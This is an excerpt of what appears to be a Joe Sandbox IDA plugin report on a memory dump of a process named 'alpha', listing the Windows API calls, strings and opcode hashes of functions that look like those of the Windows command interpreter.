                                                                                        • Part of subcall function 00007FF793753578: _get_osfhandle.MSVCRT ref: 00007FF793753584
                                                                                        • Part of subcall function 00007FF793753578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF79375359C
                                                                                        • Part of subcall function 00007FF793753578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535C3
                                                                                        • Part of subcall function 00007FF793753578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535D9
                                                                                        • Part of subcall function 00007FF793753578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535ED
                                                                                        • Part of subcall function 00007FF793753578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF793753602
                                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF793753491,?,?,?,00007FF793764420), ref: 00007FF793753514
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF793753522
                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF793753491,?,?,?,00007FF793764420), ref: 00007FF793753541
                                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF793753491,?,?,?,00007FF793764420), ref: 00007FF79375355E
                                                                                        • Part of subcall function 00007FF7937536EC: _get_osfhandle.MSVCRT ref: 00007FF793753715
                                                                                        • Part of subcall function 00007FF7937536EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF793753770
                                                                                        • Part of subcall function 00007FF7937536EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF793753791
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                                                      • String ID:
                                                                                      • API String ID: 4057327938-0
                                                                                      • Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                      • Instruction ID: a582bde19aa0065ef1ab6d67d599b1339a4c6851de83f62700157bae693e8267
                                                                                      • Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                      • Instruction Fuzzy Hash: 8431A121A08A4286F7F9BB3594801B9F6A8EF8D741FC4413AD94E627A1DF3CE9049670
                                                                                      APIs
                                                                                      • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7937654E6
                                                                                      • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF79376552E
                                                                                        • Part of subcall function 00007FF79376758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF793766999,?,?,?,?,?,00007FF793758C39), ref: 00007FF7937675AE
                                                                                        • Part of subcall function 00007FF79376758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF793766999,?,?,?,?,?,00007FF793758C39), ref: 00007FF7937675C6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CreateCurrentMutexProcess
                                                                                      • String ID: Local\SM0:%d:%d:%hs$wil$x
                                                                                      • API String ID: 779401067-630742106
                                                                                      • Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                      • Instruction ID: ecab872ab862bb5ac31dfab98c95c7e22a3d1aa193bea514396cd5fb561f79e6
                                                                                      • Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                      • Instruction Fuzzy Hash: C051C972618A8281EBB1AB31E4A47FAE365EF8C798FC44031DA0E67B55DE3CD405C721
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValue
                                                                                      • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                      • API String ID: 3677997916-3870813718
                                                                                      • Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                      • Instruction ID: edd0383eac29cc3befd8efa02ad1d4ed1bcb7bc0f2acef5670c0b9f9b8948afc
                                                                                      • Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                      • Instruction Fuzzy Hash: C1115E72618B41C7EB609B20E48426AF7A8FB89765F804231DB8D137A8DF7CD148CF10
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: memsetwcsrchr$wcschr
                                                                                      • String ID:
                                                                                      • API String ID: 110935159-0
                                                                                      • Opcode ID: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                                                                      • Instruction ID: ac86cb9b02b6d142be99b65d12e27b5bbc8461f1910960b4bcf6114e8ee6b853
                                                                                      • Opcode Fuzzy Hash: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                                                                      • Instruction Fuzzy Hash: 3551D722B0978285FEB1AB2198983F9D399BF4DBA4F894531CE5D2B7C4DE3CE5419310
                                                                                      APIs
                                                                                      • _wcsicmp.MSVCRT ref: 00007FF79374B4BD
                                                                                        • Part of subcall function 00007FF7937506C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF7937506D6
                                                                                        • Part of subcall function 00007FF7937506C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF7937506F0
                                                                                        • Part of subcall function 00007FF7937506C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF79375074D
                                                                                        • Part of subcall function 00007FF7937506C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF793750762
                                                                                      • _wcsicmp.MSVCRT ref: 00007FF79374B518
                                                                                      • _wcsicmp.MSVCRT ref: 00007FF79374B58B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Heap$_wcsicmp$AllocProcess
                                                                                      • String ID: ELSE$IF/?
                                                                                      • API String ID: 3223794493-1134991328
                                                                                      • Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                      • Instruction ID: 44a51ca4b7972b9b0a796843889b356c3f4887dbcdcd015dbb18842c6d4bac6e
                                                                                      • Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                      • Instruction Fuzzy Hash: C8414A21A0964381FBF4BB35A4D92BAE6AEAF4C744FC44039D54E663A5DE3CF8008761
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                                                                                      • String ID:
                                                                                      • API String ID: 1532185241-0
                                                                                      • Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                      • Instruction ID: f39d3dc08ebb12bc9e39a97f9a341872957bdac2845b85c9a440d7c9298e6d70
                                                                                      • Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                      • Instruction Fuzzy Hash: 4F41F632A04B5187F7A4AB31E49557DFAA5FB8CB80F844535EA0A53B81CF3CE941CB21
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                                      • String ID:
                                                                                      • API String ID: 3588551418-0
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF7937501B8: _get_osfhandle.MSVCRT ref: 00007FF7937501C4
                                                                                        • Part of subcall function 00007FF7937501B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF79375E904,?,?,?,?,00000000,00007FF793753491,?,?,?,00007FF793764420), ref: 00007FF7937501D6
                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF79376D0F9
                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF79376D10F
                                                                                      • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF79376D166
                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF79376D17A
                                                                                      • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF79376D18C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                                      • String ID:
                                                                                      • API String ID: 3008996577-0
                                                                                      APIs
                                                                                      • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF79376B934
                                                                                      • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF793755085), ref: 00007FF79376B9A5
                                                                                      • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF793755085), ref: 00007FF79376B9F7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                                      • String ID: %WINDOWS_COPYRIGHT%
                                                                                      • API String ID: 1103618819-1745581171
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: fprintf
                                                                                      • String ID: CMD Internal Error %s$%s$Null environment
                                                                                      • API String ID: 383729395-2781220306
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc
                                                                                      • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                                      • API String ID: 1646373207-2530943252
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc
                                                                                      • String ID: RaiseFailFastException$kernelbase.dll
                                                                                      • API String ID: 1646373207-919018592
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsnicmp$wcschr
                                                                                      • String ID:
                                                                                      • API String ID: 3270668897-0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcstol$lstrcmp
                                                                                      • String ID:
                                                                                      • API String ID: 3515581199-0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$DriveNamePathTypeVolume
                                                                                      • String ID:
                                                                                      • API String ID: 1029679093-0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocProcess
                                                                                      • String ID:
                                                                                      • API String ID: 1617791916-0
                                                                                      • Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                      • Instruction ID: 87d80e238fb7f5240acecd80a99318c3259e1028ee334585bc7f87be8c119fe0
                                                                                      • Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                      • Instruction Fuzzy Hash: 8F21B861608B4196EA64AB71A590079F7A5FF8DBD1B849234CE1F23755DF3CE4018760
                                                                                      APIs
                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF79375507A), ref: 00007FF79376D01C
                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF79375507A), ref: 00007FF79376D033
                                                                                      • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF79375507A), ref: 00007FF79376D06D
                                                                                      • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF79375507A), ref: 00007FF79376D07F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                                      • String ID:
                                                                                      • API String ID: 1033415088-0
                                                                                      • Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                      • Instruction ID: 55458762fe394f7b4b5b63179219d260baa1e86831a1c97bf7380498bc13a5f6
                                                                                      • Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                      • Instruction Fuzzy Hash: 6411B231618A4287EB949B30F09417AF7A4FB8EB95F805135EA8F57B94DF3CD0458B60
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF79374CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDA6
                                                                                        • Part of subcall function 00007FF79374CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDBD
                                                                                      • wcschr.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF79376827A), ref: 00007FF7937711DC
                                                                                      • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF79376827A), ref: 00007FF793771277
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocProcessmemmovewcschr
                                                                                      • String ID: &()[]{}^=;!%'+,`~
                                                                                      • API String ID: 1135967885-381716982
                                                                                      • Opcode ID: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                      • Instruction ID: cdb83d35fa5b77e32f8fe7f98466407e4391bb31a7b78aa3011ea5c0f2e2e3bb
                                                                                      • Opcode Fuzzy Hash: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                      • Instruction Fuzzy Hash: A0718B71A0824285E7B0EF35A4C06B9FAE8FB5C795F904235DA5EA7B94DF3CA4418B10
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF7937506C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF7937506D6
                                                                                        • Part of subcall function 00007FF7937506C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF7937506F0
                                                                                        • Part of subcall function 00007FF7937506C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF79375074D
                                                                                        • Part of subcall function 00007FF7937506C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF793750762
                                                                                        • Part of subcall function 00007FF79374EF40: iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF79374E626,?,?,00000000,00007FF793751F69), ref: 00007FF79374F000
                                                                                        • Part of subcall function 00007FF79374EF40: wcschr.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F031
                                                                                        • Part of subcall function 00007FF79374EF40: iswdigit.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F0D6
                                                                                      • longjmp.MSVCRT ref: 00007FF79375CCBC
                                                                                      • longjmp.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79375CCE0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
                                                                                      • String ID: GeToken: (%x) '%s'
                                                                                      • API String ID: 3282654869-1994581435
                                                                                      • Opcode ID: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                                      • Instruction ID: 99633e7b5e42baa270dfa065b0535cb58dc77fad7db15a9d08ef94ad39ac433f
                                                                                      • Opcode Fuzzy Hash: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                                      • Instruction Fuzzy Hash: B261D661B0964282FAB5BB3594D8279E3A9AF4DBB4FD44535CA1D27BD1EE3CF4408320
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memmovewcsncmp
                                                                                      • String ID: 0123456789
                                                                                      • API String ID: 3879766669-2793719750
                                                                                      • Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                      • Instruction ID: af59d75762b152ca902993d159d517179d91700b54b454e3fa65e5b11c6e95f4
                                                                                      • Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                      • Instruction Fuzzy Hash: F541F622F1878681EEB5AF3594802BAA398FB4CB81F855131CE0E63784EE3CD4458790
                                                                                      APIs
                                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF79376A0FC
                                                                                        • Part of subcall function 00007FF79374D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF79374D46E
                                                                                        • Part of subcall function 00007FF79374D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF79374D485
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D4EE
                                                                                        • Part of subcall function 00007FF79374D3F0: iswspace.MSVCRT ref: 00007FF79374D54D
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D569
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D58C
                                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF79376A1FB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                      • String ID: Software\Classes
                                                                                      • API String ID: 2714550308-1656466771
                                                                                      • Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                      • Instruction ID: c9b7cb568daea7bb68fde1f28dc672474092396fb4d67924aa0124a7b5e25a10
                                                                                      • Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                      • Instruction Fuzzy Hash: BB41D422B09B1281EAE4EB25D494439A3B9FB4C7D4F808131DE5E533E0EE39E841C352
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsnicmp
                                                                                      • String ID: /-Y
                                                                                      • API String ID: 1886669725-4274875248
                                                                                      • Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                      • Instruction ID: 933df7ec9d4531cf0f7f0a647e6882fe3861c6e257788bb51cad2ac6043d301b
                                                                                      • Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                      • Instruction Fuzzy Hash: 93217165B0875681FAB0AB229488178F6E6BB5CFC0F849031DE4D277D4DE3CE4A2D720